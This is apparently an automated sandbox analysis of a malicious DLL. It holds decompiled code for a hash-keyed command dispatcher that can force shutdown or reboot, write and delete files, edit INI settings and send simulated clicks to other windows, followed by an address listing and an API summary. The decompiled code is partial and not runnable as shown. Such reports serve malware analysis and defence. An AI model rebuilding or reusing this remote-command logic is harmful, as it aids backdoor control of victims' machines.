                                                                                                                        							_t153 = LookupPrivilegeValueW(0, _t152, _t283 + 0x24);
                                                                                                                        							__eflags = _t153;
                                                                                                                        							if(_t153 == 0) {
                                                                                                                        								goto L98;
                                                                                                                        							}
                                                                                                                        							 *(_t283 + 0x38) = 1;
                                                                                                                        							 *((intOrPtr*)(_t283 + 0x44)) = 2;
                                                                                                                        							_t154 = AdjustTokenPrivileges( *(_t283 + 0x10), 0, _t283 + 0x2c, 0, 0, 0);
                                                                                                                        							__eflags = _t154;
                                                                                                                        							if(_t154 == 0) {
                                                                                                                        								goto L98;
                                                                                                                        							}
                                                                                                                        							asm("sbb esi, esi");
                                                                                                                        							_t276 = ( ~(_t271 - 0xc110de04) & 0x00000006) + 2;
                                                                                                                        							__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 1;
                                                                                                                        							if( *((intOrPtr*)(_t283 + 0x14)) > 1) {
                                                                                                                        								_t156 =  *((intOrPtr*)(_t280 + 4));
                                                                                                                        								__eflags =  *_t156 - 0x66;
                                                                                                                        								if( *_t156 == 0x66) {
                                                                                                                        									__eflags =  *((char*)(_t156 + 1));
                                                                                                                        									if( *((char*)(_t156 + 1)) == 0) {
                                                                                                                        										_t276 = _t276 | 0x00000014;
                                                                                                                        										__eflags = _t276;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							_t155 = ExitWindowsEx(_t276, 0);
                                                                                                                        							__eflags = _t155;
                                                                                                                        							if(_t155 != 0) {
                                                                                                                        								goto L130;
                                                                                                                        							} else {
                                                                                                                        								goto L98;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(__eflags == 0) {
                                                                                                                        							_push(0);
                                                                                                                        							_push(0);
                                                                                                                        							_push(0x66);
                                                                                                                        							goto L84;
                                                                                                                        						}
                                                                                                                        						__eflags = _t271 - 0xb3beafae;
                                                                                                                        						if(__eflags > 0) {
                                                                                                                        							__eflags = _t271 - 0xb9154c3e;
                                                                                                                        							if(_t271 == 0xb9154c3e) {
                                                                                                                        								E6F335060(5, 0, 1);
                                                                                                                        								_t283 = _t283 + 0xc;
                                                                                                                        								goto L130;
                                                                                                                        							}
                                                                                                                        							__eflags = _t271 - 0xc110de04;
                                                                                                                        							if(_t271 == 0xc110de04) {
                                                                                                                        								goto L90;
                                                                                                                        							}
                                                                                                                        							__eflags = _t271 - 0xc52dedf4;
                                                                                                                        							if(_t271 != 0xc52dedf4) {
                                                                                                                        								goto L115;
                                                                                                                        							}
                                                                                                                        							_push(0);
                                                                                                                        							_push(0);
                                                                                                                        							_push(0x75);
                                                                                                                        							goto L84;
                                                                                                                        						}
                                                                                                                        						if(__eflags == 0) {
                                                                                                                        							L57:
                                                                                                                        							__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 3;
                                                                                                                        							if( *((intOrPtr*)(_t283 + 0x14)) >= 3) {
                                                                                                                        								_t281 = 0;
                                                                                                                        								 *(_t283 + 0x30) = 0;
                                                                                                                        								__eflags = _t271 - 0x539b9257;
                                                                                                                        								if(_t271 != 0x539b9257) {
                                                                                                                        									_t264 =  *(_t283 + 0x10);
                                                                                                                        									_t159 = ExpandEnvironmentStringsA( *(_t264 + 8), _t283 + 0x34, 0x104);
                                                                                                                        									__eflags = _t159;
                                                                                                                        									if(_t159 == 0) {
                                                                                                                        										L63:
                                                                                                                        										_t223 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        										wsprintfA(_t283 + 0x38, "%s%s", _t223,  *(_t264 + 8));
                                                                                                                        										_t283 = _t283 + 0x10;
                                                                                                                        										L64:
                                                                                                                        										_t163 = StrRChrA(_t283 + 0x38, 0, 0x5c);
                                                                                                                        										_t265 = _t163;
                                                                                                                        										__eflags = _t265;
                                                                                                                        										if(_t265 != 0) {
                                                                                                                        											 *_t265 = 0;
                                                                                                                        										}
                                                                                                                        										__imp__SHCreateDirectoryExA(0, _t283 + 0x34, 0);
                                                                                                                        										__eflags = _t265;
                                                                                                                        										if(_t265 != 0) {
                                                                                                                        											 *_t265 = 0x5c;
                                                                                                                        										}
                                                                                                                        										__eflags = _t163;
                                                                                                                        										if(_t163 == 0) {
                                                                                                                        											L71:
                                                                                                                        											_push(_t283 + 0x30);
                                                                                                                        											_push( *((intOrPtr*)( *(_t283 + 0x10) + 4)));
                                                                                                                        											_t281 = E6F335A00();
                                                                                                                        											_t283 = _t283 + 8;
                                                                                                                        											__eflags = _t281;
                                                                                                                        											if(_t281 == 0) {
                                                                                                                        												goto L77;
                                                                                                                        											}
                                                                                                                        											__eflags = _t271 - 0xb3beafae;
                                                                                                                        											if(_t271 != 0xb3beafae) {
                                                                                                                        												__eflags = _t271 - 0x539b9257;
                                                                                                                        												if(_t271 != 0x539b9257) {
                                                                                                                        													goto L77;
                                                                                                                        												}
                                                                                                                        												_t168 = E6F332750(_t283 + 0x30);
                                                                                                                        												_t283 = _t283 + 4;
                                                                                                                        												L76:
                                                                                                                        												_t281 = _t168;
                                                                                                                        												goto L77;
                                                                                                                        											}
                                                                                                                        											_push(0);
                                                                                                                        											_push(0);
                                                                                                                        											_push(1);
                                                                                                                        											_t168 = E6F334230("open", _t283 + 0x40, 0);
                                                                                                                        											_t283 = _t283 + 0x18;
                                                                                                                        											goto L76;
                                                                                                                        										} else {
                                                                                                                        											__eflags = _t163 - 0x50;
                                                                                                                        											if(_t163 == 0x50) {
                                                                                                                        												goto L71;
                                                                                                                        											}
                                                                                                                        											__eflags = _t163 - 0xb7;
                                                                                                                        											if(_t163 != 0xb7) {
                                                                                                                        												L77:
                                                                                                                        												E6F335AF0(_t209, _t281, 0, 0);
                                                                                                                        												_t280 =  *(_t283 + 0x20);
                                                                                                                        												_t283 = _t283 + 0x10;
                                                                                                                        												goto L130;
                                                                                                                        											}
                                                                                                                        											goto L71;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									_t169 = PathIsRelativeA(_t283 + 0x30);
                                                                                                                        									__eflags = _t169;
                                                                                                                        									if(_t169 == 0) {
                                                                                                                        										goto L64;
                                                                                                                        									}
                                                                                                                        									goto L63;
                                                                                                                        								}
                                                                                                                        								_t226 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        								wsprintfA(_t283 + 0x3c, "%s%s%s", _t226,  *((intOrPtr*)( *(_t283 + 0x10) + 8)), ".pdll");
                                                                                                                        								_t283 = _t283 + 0x14;
                                                                                                                        								goto L64;
                                                                                                                        							}
                                                                                                                        							E6F335AF0(_t209, 2, 0, 0);
                                                                                                                        							_t283 = _t283 + 0x10;
                                                                                                                        							goto L130;
                                                                                                                        						}
                                                                                                                        						__eflags = _t271 - 0x94a62224;
                                                                                                                        						if(__eflags > 0) {
                                                                                                                        							__eflags = _t271 - 0x98666ff0;
                                                                                                                        							if(_t271 != 0x98666ff0) {
                                                                                                                        								goto L115;
                                                                                                                        							}
                                                                                                                        							 *((intOrPtr*)(_t283 + 0x14)) = GetTickCount();
                                                                                                                        							_t174 = RtlRandom(_t283 + 0x10);
                                                                                                                        							_push(".cab");
                                                                                                                        							_t227 = _t283 + 0x34;
                                                                                                                        							__eflags =  *(_t283 + 0x18) - 1;
                                                                                                                        							if( *(_t283 + 0x18) <= 1) {
                                                                                                                        								_t175 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        								_push( *_t280);
                                                                                                                        								_push(_t175);
                                                                                                                        								wsprintfA(_t227, "%s%s%s");
                                                                                                                        								_t291 = _t283 + 0x14;
                                                                                                                        							} else {
                                                                                                                        								_push(_t174);
                                                                                                                        								_t186 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        								_push(0x75);
                                                                                                                        								_push(_t186);
                                                                                                                        								wsprintfA(_t227, "%s%c%lu%s");
                                                                                                                        								_t291 = _t283 + 0x18;
                                                                                                                        							}
                                                                                                                        							__eflags =  *((intOrPtr*)(_t291 + 0x14)) - 1;
                                                                                                                        							if( *((intOrPtr*)(_t291 + 0x14)) <= 1) {
                                                                                                                        								L53:
                                                                                                                        								_t177 = GetFileAttributesA(_t291 + 0x30);
                                                                                                                        								__eflags = _t177 - 0xffffffff;
                                                                                                                        								if(_t177 == 0xffffffff) {
                                                                                                                        									L106:
                                                                                                                        									E6F335AF0(_t209, 0, 0, 0);
                                                                                                                        									_t283 = _t291 + 0x10;
                                                                                                                        									goto L130;
                                                                                                                        								}
                                                                                                                        								goto L54;
                                                                                                                        							} else {
                                                                                                                        								_push(_t291 + 0x30);
                                                                                                                        								_push( *((intOrPtr*)(_t280 + 4)));
                                                                                                                        								_t185 = E6F335A00();
                                                                                                                        								_t291 = _t291 + 8;
                                                                                                                        								__eflags = _t185;
                                                                                                                        								if(_t185 != 0) {
                                                                                                                        									L54:
                                                                                                                        									_t254 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        									_t180 = E6F332DC0(_t291 + 0x38, _t254, 1);
                                                                                                                        									_t283 = _t291 + 0xc;
                                                                                                                        									__eflags = _t180;
                                                                                                                        									if(_t180 != 0) {
                                                                                                                        										E6F335AF0(_t209, 1, 0, 0);
                                                                                                                        										E6F335060(5, 1, 0);
                                                                                                                        										_t283 = _t283 + 0x1c;
                                                                                                                        									}
                                                                                                                        									DeleteFileA(_t283 + 0x30);
                                                                                                                        									goto L130;
                                                                                                                        								}
                                                                                                                        								goto L53;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(__eflags == 0) {
                                                                                                                        							goto L57;
                                                                                                                        						}
                                                                                                                        						__eflags = _t271 - 0x5d22927c;
                                                                                                                        						if(_t271 == 0x5d22927c) {
                                                                                                                        							 *(_t283 + 0x1c) = GetTickCount();
                                                                                                                        							wsprintfA(_t283 + 0x24, "%lu", RtlRandom(_t283 + 0x1c));
                                                                                                                        							_t256 = M6F3404CC; // 0x99d818
                                                                                                                        							_t283 = _t283 + 0xc;
                                                                                                                        							_t257 = M6F3404F0; // 0x998d58
                                                                                                                        							 *(_t283 + 0x20) = 0x6467;
                                                                                                                        							 *((char*)(_t283 + 0x22)) = 0;
                                                                                                                        							_t193 = WritePrivateProfileStringA(_t257, _t283 + 0x18, _t283 + 0x24, _t256);
                                                                                                                        							__eflags = _t193;
                                                                                                                        							if(_t193 != 0) {
                                                                                                                        								goto L107;
                                                                                                                        							}
                                                                                                                        							goto L106;
                                                                                                                        						}
                                                                                                                        						__eflags = _t271 - 0x876bcf36;
                                                                                                                        						if(_t271 == 0x876bcf36) {
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        						E6F335AF0(_t209, 4, 0, 0);
                                                                                                                        						_t283 = _t283 + 0x10;
                                                                                                                        						goto L130;
                                                                                                                        					}
                                                                                                                        					if(_t298 == 0) {
                                                                                                                        						goto L57;
                                                                                                                        					}
                                                                                                                        					_t299 = _t271 - 0x2a4ba2d1;
                                                                                                                        					if(_t299 > 0) {
                                                                                                                        						__eflags = _t271 - 0x2f1f4648;
                                                                                                                        						if(_t271 == 0x2f1f4648) {
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        						__eflags = _t271 - 0x4231ab60;
                                                                                                                        						if(_t271 == 0x4231ab60) {
                                                                                                                        							L37:
                                                                                                                        							_t258 =  *0x6f340398; // 0x0
                                                                                                                        							PostMessageA(GetDlgItem(_t258, 0x4e83), 0x111, 0x9cb6, 0);
                                                                                                                        							_t197 =  *0x6f34039c; // 0x0
                                                                                                                        							PostMessageA(_t197, 0x201, 1, 0x490017);
                                                                                                                        							Sleep(0x64);
                                                                                                                        							_t232 =  *0x6f34039c; // 0x0
                                                                                                                        							PostMessageA(_t232, 0x202, 0, 0x490017);
                                                                                                                        							Sleep(0x7d0);
                                                                                                                        							E6F335AF0(_t209, 1, 0, 0);
                                                                                                                        							_t283 = _t283 + 0x10;
                                                                                                                        							goto L130;
                                                                                                                        						}
                                                                                                                        						__eflags = _t271 - 0x4779d712;
                                                                                                                        						if(_t271 == 0x4779d712) {
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        						E6F335AF0(_t209, 4, 0, 0);
                                                                                                                        						_t283 = _t283 + 0x10;
                                                                                                                        						goto L130;
                                                                                                                        					}
                                                                                                                        					if(_t299 == 0) {
                                                                                                                        						_t259 =  *((intOrPtr*)(_t283 + 0x14));
                                                                                                                        						__eflags = _t259 - 2;
                                                                                                                        						if(_t259 >= 2) {
                                                                                                                        							_t202 =  *((intOrPtr*)(_t280 + 4));
                                                                                                                        							_t233 =  *_t202;
                                                                                                                        							__eflags = _t233 - 0x69;
                                                                                                                        							if(_t233 != 0x69) {
                                                                                                                        								L21:
                                                                                                                        								__eflags = _t233 - 0x72;
                                                                                                                        								if(_t233 != 0x72) {
                                                                                                                        									goto L117;
                                                                                                                        								}
                                                                                                                        								__eflags =  *((char*)(_t202 + 1));
                                                                                                                        								if( *((char*)(_t202 + 1)) != 0) {
                                                                                                                        									goto L117;
                                                                                                                        								}
                                                                                                                        								_t234 = 0;
                                                                                                                        								__eflags = 0;
                                                                                                                        								L24:
                                                                                                                        								__eflags = _t259 - 2;
                                                                                                                        								if(_t259 <= 2) {
                                                                                                                        									L28:
                                                                                                                        									_t203 = 0;
                                                                                                                        									__eflags = 0;
                                                                                                                        									L29:
                                                                                                                        									_push(_t203);
                                                                                                                        									_push(_t234);
                                                                                                                        									_t204 = E6F3344D0(_t209, _t262);
                                                                                                                        									_t291 = _t283 + 8;
                                                                                                                        									__eflags = _t204;
                                                                                                                        									if(_t204 == 0) {
                                                                                                                        										goto L106;
                                                                                                                        									}
                                                                                                                        									_t279 = 5;
                                                                                                                        									do {
                                                                                                                        										Sleep(0x3e8);
                                                                                                                        										_t279 = _t279 - 1;
                                                                                                                        										__eflags = _t279;
                                                                                                                        									} while (_t279 != 0);
                                                                                                                        									E6F335060(5, 1, _t279);
                                                                                                                        									_t283 = _t291 + 0xc;
                                                                                                                        									goto L130;
                                                                                                                        								}
                                                                                                                        								_t206 =  *((intOrPtr*)(_t280 + 8));
                                                                                                                        								__eflags =  *_t206 - 0x66;
                                                                                                                        								if( *_t206 != 0x66) {
                                                                                                                        									goto L28;
                                                                                                                        								}
                                                                                                                        								__eflags =  *((char*)(_t206 + 1));
                                                                                                                        								if( *((char*)(_t206 + 1)) != 0) {
                                                                                                                        									goto L28;
                                                                                                                        								}
                                                                                                                        								_t203 = 1;
                                                                                                                        								goto L29;
                                                                                                                        							}
                                                                                                                        							__eflags =  *((char*)(_t202 + 1));
                                                                                                                        							if( *((char*)(_t202 + 1)) != 0) {
                                                                                                                        								goto L21;
                                                                                                                        							}
                                                                                                                        							_t234 = 1;
                                                                                                                        							goto L24;
                                                                                                                        						} else {
                                                                                                                        							E6F335AF0(_t209, 2, 0, 0);
                                                                                                                        							_t283 = _t283 + 0x10;
                                                                                                                        							goto L130;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					if(_t271 == 0x76a0ce1) {
                                                                                                                        						E6F3352B0(_t280, 0);
                                                                                                                        						_t283 = _t283 + 4;
                                                                                                                        						goto L130;
                                                                                                                        					}
                                                                                                                        					if(_t271 == 0x190cb7c3) {
                                                                                                                        						goto L37;
                                                                                                                        					}
                                                                                                                        					if(_t271 != 0x2965d6c5) {
                                                                                                                        						goto L115;
                                                                                                                        					}
                                                                                                                        					goto L13;
                                                                                                                        				}
                                                                                                                        			}


































































                                                                                                                        0x6f3361f3
                                                                                                                        0x6f3361f4
                                                                                                                        0x6f3361ff
                                                                                                                        0x6f336205
                                                                                                                        0x6f336219
                                                                                                                        0x6f33621e
                                                                                                                        0x6f3361c9
                                                                                                                        0x6f3361c9
                                                                                                                        0x6f3361cf
                                                                                                                        0x6f3361de
                                                                                                                        0x6f3361e3
                                                                                                                        0x6f3361e3
                                                                                                                        0x00000000
                                                                                                                        0x6f3361c7
                                                                                                                        0x6f336094
                                                                                                                        0x6f33609a
                                                                                                                        0x6f33614f
                                                                                                                        0x6f336154
                                                                                                                        0x6f336180
                                                                                                                        0x6f336197
                                                                                                                        0x6f3361b0
                                                                                                                        0x6f3361b5
                                                                                                                        0x6f336156
                                                                                                                        0x6f336156
                                                                                                                        0x6f33615d
                                                                                                                        0x6f336170
                                                                                                                        0x6f336175
                                                                                                                        0x6f336175
                                                                                                                        0x00000000
                                                                                                                        0x6f336154
                                                                                                                        0x6f3360a0
                                                                                                                        0x6f3360a6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3360ac
                                                                                                                        0x6f3360b5
                                                                                                                        0x6f3360bb
                                                                                                                        0x6f3360bd
                                                                                                                        0x6f33613b
                                                                                                                        0x6f336142
                                                                                                                        0x6f336147
                                                                                                                        0x00000000
                                                                                                                        0x6f336147
                                                                                                                        0x6f3360bf
                                                                                                                        0x6f3360cc
                                                                                                                        0x6f3360d2
                                                                                                                        0x6f3360d4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3360ed
                                                                                                                        0x6f3360f1
                                                                                                                        0x6f3360f9
                                                                                                                        0x6f3360ff
                                                                                                                        0x6f336101
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33610b
                                                                                                                        0x6f336110
                                                                                                                        0x6f336113
                                                                                                                        0x6f336117
                                                                                                                        0x6f336119
                                                                                                                        0x6f33611c
                                                                                                                        0x6f33611f
                                                                                                                        0x6f336121
                                                                                                                        0x6f336125
                                                                                                                        0x6f336127
                                                                                                                        0x6f336127
                                                                                                                        0x6f336127
                                                                                                                        0x6f336125
                                                                                                                        0x6f33611f
                                                                                                                        0x6f33612d
                                                                                                                        0x6f336133
                                                                                                                        0x6f336135
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336135
                                                                                                                        0x6f335db1
                                                                                                                        0x6f336059
                                                                                                                        0x6f33605b
                                                                                                                        0x6f33605d
                                                                                                                        0x00000000
                                                                                                                        0x6f33605d
                                                                                                                        0x6f335db7
                                                                                                                        0x6f335dbd
                                                                                                                        0x6f336022
                                                                                                                        0x6f336028
                                                                                                                        0x6f33604c
                                                                                                                        0x6f336051
                                                                                                                        0x00000000
                                                                                                                        0x6f336051
                                                                                                                        0x6f33602a
                                                                                                                        0x6f336030
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336032
                                                                                                                        0x6f336038
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33603e
                                                                                                                        0x6f336040
                                                                                                                        0x6f336042
                                                                                                                        0x00000000
                                                                                                                        0x6f336042
                                                                                                                        0x6f335dc3
                                                                                                                        0x6f335edb
                                                                                                                        0x6f335edb
                                                                                                                        0x6f335ee0
                                                                                                                        0x6f335ef6
                                                                                                                        0x6f335ef8
                                                                                                                        0x6f335efd
                                                                                                                        0x6f335f03
                                                                                                                        0x6f335f2e
                                                                                                                        0x6f335f40
                                                                                                                        0x6f335f46
                                                                                                                        0x6f335f48
                                                                                                                        0x6f335f59
                                                                                                                        0x6f335f5c
                                                                                                                        0x6f335f6e
                                                                                                                        0x6f335f74
                                                                                                                        0x6f335f77
                                                                                                                        0x6f335f80
                                                                                                                        0x6f335f86
                                                                                                                        0x6f335f88
                                                                                                                        0x6f335f8a
                                                                                                                        0x6f335f8c
                                                                                                                        0x6f335f8c
                                                                                                                        0x6f335f98
                                                                                                                        0x6f335f9e
                                                                                                                        0x6f335fa0
                                                                                                                        0x6f335fa2
                                                                                                                        0x6f335fa2
                                                                                                                        0x6f335fa5
                                                                                                                        0x6f335fa7
                                                                                                                        0x6f335fb5
                                                                                                                        0x6f335fc0
                                                                                                                        0x6f335fc1
                                                                                                                        0x6f335fc7
                                                                                                                        0x6f335fc9
                                                                                                                        0x6f335fcc
                                                                                                                        0x6f335fce
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335fd0
                                                                                                                        0x6f335fd6
                                                                                                                        0x6f335ff4
                                                                                                                        0x6f335ffa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336001
                                                                                                                        0x6f336006
                                                                                                                        0x6f336009
                                                                                                                        0x6f336009
                                                                                                                        0x00000000
                                                                                                                        0x6f336009
                                                                                                                        0x6f335fd8
                                                                                                                        0x6f335fda
                                                                                                                        0x6f335fdc
                                                                                                                        0x6f335fea
                                                                                                                        0x6f335fef
                                                                                                                        0x00000000
                                                                                                                        0x6f335fa9
                                                                                                                        0x6f335fa9
                                                                                                                        0x6f335fac
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335fae
                                                                                                                        0x6f335fb3
                                                                                                                        0x6f33600b
                                                                                                                        0x6f336011
                                                                                                                        0x6f336016
                                                                                                                        0x6f33601a
                                                                                                                        0x00000000
                                                                                                                        0x6f33601a
                                                                                                                        0x00000000
                                                                                                                        0x6f335fb3
                                                                                                                        0x6f335fa7
                                                                                                                        0x6f335f4f
                                                                                                                        0x6f335f55
                                                                                                                        0x6f335f57
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335f57
                                                                                                                        0x6f335f0c
                                                                                                                        0x6f335f23
                                                                                                                        0x6f335f29
                                                                                                                        0x00000000
                                                                                                                        0x6f335f29
                                                                                                                        0x6f335ee9
                                                                                                                        0x6f335eee
                                                                                                                        0x00000000
                                                                                                                        0x6f335eee
                                                                                                                        0x6f335dc9
                                                                                                                        0x6f335dcf
                                                                                                                        0x6f335e03
                                                                                                                        0x6f335e09
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335e1a
                                                                                                                        0x6f335e1e
                                                                                                                        0x6f335e29
                                                                                                                        0x6f335e2e
                                                                                                                        0x6f335e32
                                                                                                                        0x6f335e36
                                                                                                                        0x6f335e55
                                                                                                                        0x6f335e5a
                                                                                                                        0x6f335e5b
                                                                                                                        0x6f335e62
                                                                                                                        0x6f335e68
                                                                                                                        0x6f335e38
                                                                                                                        0x6f335e38

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • CharLowerA.USER32 ref: 6F335B93
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 6F335BB5
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F335BBC
                                                                                                                        • lstrlenA.KERNEL32 ref: 6F335BD2
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F335BE1
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F335CE5
                                                                                                                          • Part of subcall function 6F335AF0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6F335B03
                                                                                                                          • Part of subcall function 6F335AF0: PostThreadMessageA.USER32 ref: 6F335B2E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F336401
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336408
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F336420
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6F33643B
                                                                                                                        • CloseHandle.KERNEL32 ref: 6F336444
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F336450
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336453
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F33645F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336462
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F336467
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33646A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
